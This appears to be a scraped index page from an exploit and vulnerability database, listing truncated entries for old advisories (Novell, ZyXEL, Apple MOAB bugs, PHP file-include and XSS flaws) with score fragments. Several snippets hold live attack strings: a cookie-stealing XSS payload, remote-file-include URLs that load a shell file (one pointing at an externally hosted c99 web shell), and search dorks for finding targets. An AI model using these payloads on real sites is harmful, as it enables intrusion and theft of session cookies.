Novell Client <= 4.91 SP4 Local Stack overflow / B.S.O.D (unauthentificated user)
Application: Novell Client <= 4.91 SP4 Web Site: http://www.novell.com/products/clients/ Platform: Windows Bug: Local Stack overflow / B.S.O.D (unauthentificated user) Impact: Critical 1) Introduction 2) Bug 3) Proof of concept 4) Credits =========== 1) Introduction =========== "Novell Client™.....
0.6AI Score
7.4AI Score
EPSS
SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure Vulnerability
Exploit for unknown platform in category web...
7.1AI Score
SugarCRM Community Edition 4.5.15.0.0 - File Disclosure
SugarCRM Community Edition 4.5.15.0.0 - File...
-0.6AI Score
7.4AI Score
EPSS
Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow
Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer...
0.8AI Score
Noticeware Email Server 4.6.1.0 - Denial of Service
Noticeware Email Server 4.6.1.0 - Denial of...
-0.2AI Score
7.1AI Score
7.4AI Score
EPSS
ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root Vulnerability
Exploit for hardware platform in category remote...
7.1AI Score
ZYXEL ZyWALL QuaggaZebra - Default Password Remote Code Execution
ZYXEL ZyWALL QuaggaZebra - Default Password Remote Code...
0.4AI Score
0.183EPSS
9.8CVSS
9.6AI Score
EPSS
Two vulnerabilities for PatchLink Update Client for Unix.
PatchLink Update Unix Client File clobbering vulnerability Larry W. Cashdollar Vapid Labs 1/17/2008 Overview From the vendor: “PatchLink Update™ provides rapid, accurate and secure patch management, allowing you to proactively manage threats by automating the collection, analysis and delivery of...
-0.1AI Score
7.4AI Score
EPSS
PHP Webquest 2.6 Get Database Credentials Vulnerability
Exploit for unknown platform in category web...
7.1AI Score
-0.1AI Score
Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC)
...
7.4AI Score
EPSS
Microsoft Windows Media Player - .AIFF Divide By Zero Exception Denial of Service (PoC)
Microsoft Windows Media Player - .AIFF Divide By Zero Exception Denial of Service...
0.2AI Score
Lotus Notes buffer overflow in the Lotus WorkSheet file processor
Advisory Information Title: Lotus Notes buffer overflow in the Lotus WorkSheet file processor Advisory ID: CORE-2007-0821 Date published: 2007-11-27 Date of last update: 2007-11-27 Vendors contacted: IBM Corp. Release mode: COORDINATED RELEASE Vulnerability Information Class: Input validation...
6.9AI Score
0.071EPSS
7.1AI Score
-0.2AI Score
7.4AI Score
InnovaShop™® (mgs.jps) Cross Siting Scripting
InnovaShop™® (mgs.jps) Cross Siting Scripting Download: http://www.innovaage.com/ http://www.innovaportal.com/ Bug found by JosS / Jose Luis Góngora Fernández Contact: sys-project[at]hotmail.com Spanish Hackers Team www.spanish-hackers.com /server irc.freenode.net /join #fullsecure d0rk: "Site...
0.2AI Score
OdysseySuite™ Internet Banking vuln.
OdysseySuite™ Internet Banking vuln. Vuln. discovered by : r0t Date: 1 October 2007 Vendor:http://www.megasol.se/odysseysuite.asp affected versions:current* orginal advisory: http://pridels-team.blogspot.com/2007/10/odysseysuite-internet-banking-vuln.html OdysseySuite™ contains a flaw that...
1.5AI Score
7.4AI Score
EPSS
IPSwitch IMail Server 8.0x - Remote Heap Overflow
IPSwitch IMail Server 8.0x - Remote Heap...
0.2AI Score
Mitridat Form Processor Pro XSS
Greetings, I have discovered cross-site scripting vulnerability in Mitridat's Form Processor Pro. http://www.mitridat.com/ http://www.mitridat.com/products-form-processor-pro.html Form Mail: Email Form Processor Pro™ - process all forms on your website Form Mail: Email Form Processor Pro is the...
0.1AI Score
7.4AI Score
EPSS
PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability
No description provided by...
7.1AI Score
PsNews 1.1 - show.php?newspath Local File Inclusion
PsNews 1.1 - show.php?newspath Local File...
-0.3AI Score
WIYS v1.0 Cross-Site Scripting Vulnerability - (05.24.2007) (NEW)
WIYS v1.0 Cross-Site Scripting Vulnerability - (05.24.2007) (NEW) Vulnerability: http://www.target.com/index.php?Page=Sayfa&No="><script>alert(document.cookie)</script> Vulnerable: WIYS v1.0 Google d0rk: Bu site FORSNET taraf?ndan WIYS Yaz?l?m?™ ile haz?rlanm?st?r. Script :...
0.3AI Score
Vuln. discovered by : r0t Date: 18 May 2007 vendor:http://www.candypress.com/ affected versions: v3.5.2.14 and prior CandyPress™ Store contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "brand" and "Msg" parameter in "scripts/prodList.asp" isn't properly...
0.7AI Score
Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow
Fenice Oms server 1.10 - exec-shield Remote Buffer...
0.3AI Score
7.4AI Score
EPSS
Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability
Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability scripts : Pixaria Gallery 1.0 Discovered By : irvian scripts site : http://pixaria.com/ Thanks To : #hitamputih #nyubicrew #patihack special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz...
0.5AI Score
MOAB-27-01-2007: Telestream Flip4Mac WMV Parsing Memory Corruption Vulnerability
Summary The vendor (Telestream) provides the following description of the software: Flip4Mac™ WMV is a collection of QuickTime components that allow you to play, import, and export Windows Media video and audio files on your Mac using your favorite QuickTime-based applications. WMV files use the...
0.4AI Score
MOAB-23-01-2007: Apple QuickDraw GetSrcBits32ARGB() Memory Corruption Vulnerability
Summary Apple describes QuickDraw as follows: ...a collection of system software routines that your application can use to perform most image-manipulation operations on Macintosh computers. QuickDraw is integrated in Mac OS X since very early versions, used by Quicktime and any other application...
0.9AI Score
MOAB-21-01-2007: System Preferences writeconfig Local Privilege Escalation Vulnerability
Summary Apple provides the following description in the The Preference Application documentation: System Preferences is the standard location for presenting system-level preferences on OSX. The preference panes shipped with Mac OS X include panes affecting hardware (such as the Sound, Mouse,...
-0.1AI Score
MOAB-03-01-2007: Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability
Summary A month ago, a vulnerability in QuickTime was exploited to spread a worm in MySpace. The vulnerability was first published by pdp. In his article, pdp describes how HREFTrack attribute in .mov files can be used for malicious scripting. The MySpace worm abused this vulnerability in a...
-0.2AI Score
MOAB-01-01-2007: Apple Quicktime rtsp URL Handler Stack-based Buffer Overflow
Summary The following description of the software is provided by vendor (Apple): QuickTime 7 makes the future of video crystal clear with new features including user-friendly controls and pristine H.264 video. Upgrade to QuickTime 7 Pro and capture your own movies, then share them with friends and....
-0.1AI Score
MOAB-07-01-2007: OmniWeb Javascript alert() Format String Vulnerability
Summary The vendor (Omni Group) provides the following description: You're a Mac fan, right? When people ask you why you like the Mac, you probably think of the attention to detail that makes the Mac user experience superior. It's the sum of a lot of different things that add up to a...
-0.8AI Score
Hackers Center Security Group (http://www.hackerscenter.com/) Doz's Security Advisory Desc: ShopSite Shopping Cart Multiple XSS Risk: Medium ShopSite™ is the easiest-to-use shopping cart software for small to medium-sized businesses. ShopSite ecommerce shopping cart is one of the most...
-0.2AI Score
Comdev One Admin Pro.v4.1 ( path[skin] ) Remote File include
Comdev One Admin Pro.v4.1 ( path[skin] ) Remote File include Found by : AG-Spider C0ntAct : AG-Spider [at] msn [dot] com Affected Software : One Admin Pro.v4.1 Download Script : http://www.conovo.de/script/OneAdminPro.v4.1.zip <? include($path["docroot"].$path["skin"]. Exploit :- ...
0.4AI Score
New Bug MiniBB Forum <= 2 Remote File Include (index.php)
Title : MiniBB Forum <= 2 Remote File Include (index.php) Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi} Sorce Code: http://www.minibb.net/download.php?file=minibb20 Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : MiniBB Forum 2 (index.php)version : version [ 2 ].....
0.7AI Score
@cid stats v2.3 File Include Source Code: http://www.comscripts.com/jump.php?action=script&id=1115 Vulnerable Code:_ install.php3 In Line 41 :_ require("'.$repertoire."/".'stats_fonctions.php3 Exploit :_ http://www.VicTim.com/[@]/install.php3?repertoire=ShElL.txt? Discoverd By : ...
1AI Score
blueshoes-filemanager-4.6_public $it£ : www.blueshoes.org Remote File Include Vulnerability (APP[path][core]) Auth0r : x_w0x c0ntact : x_w0x[at]Hotmail[d0t]com w£lc0m£ In x0|0x ======================================================= C0d£ : ===== ./file.php require_once($APP['path']['core'] ....
0.1AI Score
phpLedAds 2.0(dir) File Include
phpLedAds 2.0(dir) File Include Source Code: ftp://ftp1.comscripts.com/PHP/175_phpledad-20.zip Vulnerable Code:_ click.php & ledad.php & ledad_js.php In Line 41 :_ require_once($dir . '/ad_class.php'); Exploit :_ http://www.VicTim.com/[ledads]/click.php?dir=Sh3ll.txt?...
0.5AI Score
Hi I find a new vuln ... the vuln :- Auother :- Sp1deR_NeT E-mail :- [email protected] Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi . Script :- Smarty-2.6.9 Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt? Example...
2.3AI Score
Re: Multiple XSS Vulnerabilities in Zen Cart 1.3.5
Full Disclosure Armorize Technologies Security Advisory Advisory No: Armorize-ADV-2006-0003 Status: Full Date: 2006/9/27 Summary: Armorize-ADV-2006-0003 discloses multiple cross-site scripting vulnerabilities that are found in Zen Cart, which is a PHP e-commerce shopping program and is Built on a.....
-0.1AI Score
Hi..... The Vuln :- Found By Sp1deR_NeT My Site :- www.sp1der-n3t.com ++ www.pal-hacking.com My E-mail :- Sp1deR_NeT We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi . (Palestinan HackerS TeAm) Script :- SmartyValidate-2.8 Search in Yahoo/Google :- "SmartyValidate-2.8" ======== Exploit :-...
2AI Score